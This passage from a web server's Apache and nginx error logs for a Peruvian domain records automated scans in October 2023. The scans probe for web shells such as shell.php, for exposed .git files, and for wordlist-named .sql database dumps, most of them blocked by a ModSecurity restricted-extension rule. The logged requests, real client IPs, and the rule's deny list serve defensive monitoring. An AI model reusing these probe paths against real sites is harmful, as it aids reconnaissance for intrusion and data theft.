[severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/hunter.sql"] [unique_id "ZRnKAlUZP_hxzTHJY6slnwAAANg"] [Sun Oct 01 15:49:34.795706 2023] [autoindex:error] [pid 30980:tid 140296952198912] [client 164.132.59.194:47810] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Oct 02 03:29:19.667842 2023] [ssl:warn] [pid 9851:tid 140000520968064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Oct 02 03:29:25.838852 2023] [ssl:warn] [pid 9853:tid 140000520968064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Oct 02 03:29:26.394452 2023] [ssl:warn] [pid 9853:tid 140000520968064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Oct 02 03:29:28.174294 2023] [ssl:warn] [pid 9853:tid 140000520968064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Oct 02 03:29:30.450554 2023] [ssl:warn] [pid 10269:tid 139641906345856] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Oct 02 03:29:32.603101 2023] [ssl:warn] [pid 10271:tid 139641906345856] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Oct 02 03:29:33.277616 2023] [ssl:warn] [pid 10271:tid 139641906345856] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Oct 03 03:40:22.208983 2023] [ssl:warn] [pid 22937:tid 140255863564160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Oct 03 03:40:24.397378 2023] [ssl:warn] [pid 22943:tid 140255863564160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Oct 03 03:40:24.711878 2023] [ssl:warn] [pid 22943:tid 140255863564160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Oct 03 03:40:26.438472 2023] [ssl:warn] [pid 22943:tid 140255863564160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Oct 03 03:40:28.768493 2023] [ssl:warn] [pid 23358:tid 139986412324736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Oct 03 03:40:32.963266 2023] [ssl:warn] [pid 23359:tid 139986412324736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2023/10/04 08:58:05 [error] 10269#10269: *238700 access forbidden by rule, client: 45.135.57.79, server: webmail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" [Thu Oct 05 22:52:24.090133 2023] [autoindex:error] [pid 21498:tid 139872790640384] [client 103.54.58.194:55546] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Oct 05 22:52:29.637024 2023] [:error] [pid 23380:tid 139872740284160] [client 103.54.58.194:55554] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Thu Oct 05 22:52:42.572571 2023] [autoindex:error] [pid 23381:tid 139872873551616] [client 103.54.58.194:55576] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/wordpress/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Oct 05 22:53:04.024416 2023] [autoindex:error] [pid 24743:tid 139872706713344] [client 103.54.58.194:55618] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Oct 05 22:53:24.176340 2023] [autoindex:error] [pid 24743:tid 139872664749824] [client 103.54.58.194:55650] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Oct 05 22:53:45.698647 2023] [:error] [pid 21498:tid 139872689927936] [client 103.54.58.194:55684] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Thu Oct 05 22:53:51.848107 2023] [:error] [pid 23380:tid 139872890337024] [client 103.54.58.194:55694] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Thu Oct 05 22:53:53.898679 2023] [autoindex:error] [pid 23381:tid 139872664749824] [client 103.54.58.194:55702] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Oct 05 22:53:56.724759 2023] [autoindex:error] [pid 21498:tid 139872790640384] [client 103.54.58.194:55708] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Oct 05 22:54:00.123756 2023] [autoindex:error] [pid 21498:tid 139872731891456] [client 103.54.58.194:55714] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Oct 05 22:54:26.675264 2023] [autoindex:error] [pid 23380:tid 139872731891456] [client 103.54.58.194:55764] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Oct 05 22:54:30.889415 2023] [:error] [pid 23379:tid 139872664749824] [client 103.54.58.194:55772] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/ini.php [Thu Oct 05 22:55:18.833604 2023] [:error] [pid 21498:tid 139872748676864] [client 103.54.58.194:55852] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Thu Oct 05 22:55:24.005378 2023] [:error] [pid 21498:tid 139872698320640] [client 103.54.58.194:55862] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/shell.php [Thu Oct 05 22:55:28.163686 2023] [autoindex:error] [pid 24743:tid 139872898729728] [client 103.54.58.194:55870] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Oct 05 22:55:28.829467 2023] [authz_core:error] [pid 24743:tid 139872782247680] [client 103.54.58.194:55872] AH01630: client denied by server configuration: /home/investig/public_html/.htacess.php [Thu Oct 05 23:49:45.460623 2023] [:error] [pid 23379:tid 139872898729728] [client 208.102.168.75:56734] [client 208.102.168.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/buster.sql"] [unique_id "ZR-R6V84BuRhf9r-0ljULgAAAAA"] [Fri Oct 06 01:58:41.402559 2023] [:error] [pid 21498:tid 139872790640384] [client 83.150.7.243:59228] [client 83.150.7.243] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/soccer.sql"] [unique_id "ZR-wIfBexylRZJTNvSn0lAAAAQQ"] [Fri Oct 06 04:07:10.382874 2023] [:error] [pid 19866:tid 139803441940224] [client 82.64.222.50:33478] [client 82.64.222.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/harley.sql"] [unique_id "ZR_OPn8dgCu1ybxg0fExMwAAANc"] [Fri Oct 06 06:19:29.795270 2023] [:error] [pid 19865:tid 139803576223488] [client 24.61.111.63:36050] [client 24.61.111.63] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/batman.sql"] [unique_id "ZR_tQeJoDB2_ty6hImfQCgAAAIc"] [Fri Oct 06 08:28:57.006124 2023] [:error] [pid 20117:tid 139803576223488] [client 24.206.35.218:38200] [client 24.206.35.218] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/andrew.sql"] [unique_id "ZSALmf7_oe3btv6CtNHZdwAAAQc"] [Fri Oct 06 10:42:00.611926 2023] [:error] [pid 20117:tid 139803677021952] [client 42.200.198.144:41320] [client 42.200.198.144] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/tigger.sql"] [unique_id "ZSAqyP7_oe3btv6CtNHarwAAAQM"] [Fri Oct 06 12:56:11.443561 2023] [:error] [pid 20117:tid 139803559438080] [client 118.163.251.59:44118] [client 118.163.251.59] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/sunshine.sql"] [unique_id "ZSBKO_7_oe3btv6CtNHb0QAAAQk"] [Fri Oct 06 15:10:27.835891 2023] [:error] [pid 19864:tid 139803475511040] [client 58.96.51.251:46726] [client 58.96.51.251] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/iloveyou.sql"] [unique_id "ZSBps_ut6sXsl-E2dXMITgAAAFM"] [Fri Oct 06 17:26:30.548438 2023] [:error] [pid 20117:tid 139803492296448] [client 79.129.207.6:50102] [client 79.129.207.6] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/fuckme.sql"] [unique_id "ZSCJlv7_oe3btv6CtNHeWQAAARE"] [Fri Oct 06 19:42:21.243573 2023] [:error] [pid 19866:tid 139803685414656] [client 208.102.168.75:52316] [client 208.102.168.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2000.sql"] [unique_id "ZSCpbX8dgCu1ybxg0fE2NAAAAMI"] [Sat Oct 07 02:59:36.254709 2023] [autoindex:error] [pid 17006:tid 139803517474560] [client 20.210.204.17:59682] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Oct 07 02:59:49.069887 2023] [autoindex:error] [pid 17006:tid 139803525867264] [client 20.210.204.17:59690] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Oct 07 02:59:49.746455 2023] [autoindex:error] [pid 16616:tid 139803677021952] [client 20.210.204.17:59692] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Oct 07 02:59:51.168814 2023] [autoindex:error] [pid 17006:tid 139803450332928] [client 20.210.204.17:59694] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Oct 07 03:00:17.838387 2023] [autoindex:error] [pid 16616:tid 139803559438080] [client 20.210.204.17:59740] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Oct 07 03:00:19.021940 2023] [autoindex:error] [pid 17006:tid 139803584616192] [client 20.210.204.17:59742] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2023/10/07 03:00:28 [error] 16543#16543: *281041 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 20.210.204.17, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" 2023/10/07 03:00:29 [error] 16544#16544: *281042 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 20.210.204.17, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" 2023/10/07 03:00:46 [error] 16544#16544: *281043 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 20.210.204.17, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" 2023/10/07 03:00:47 [error] 16544#16544: *281044 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 20.210.204.17, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" [Sat Oct 07 03:01:27.568575 2023] [autoindex:error] [pid 17006:tid 139803593008896] [client 20.210.204.17:59782] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Oct 07 03:01:28.974668 2023] [autoindex:error] [pid 16613:tid 139803475511040] [client 20.210.204.17:59784] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Oct 07 03:03:43.230192 2023] [autoindex:error] [pid 16617:tid 139803559438080] [client 20.210.204.17:59882] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Oct 07 03:03:43.588909 2023] [autoindex:error] [pid 17006:tid 139803576223488] [client 20.210.204.17:59884] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Oct 07 04:46:55.189692 2023] [:error] [pid 21616:tid 140671780382464] [client 81.94.73.180:33448] [client 81.94.73.180] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/hockey.sql"] [unique_id "ZSEpD1ikIJEBkl3YyC7xJAAAAIY"] [Sat Oct 07 07:05:09.080626 2023] [:error] [pid 21616:tid 140671688062720] [client 121.66.17.147:35372] [client 121.66.17.147] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ 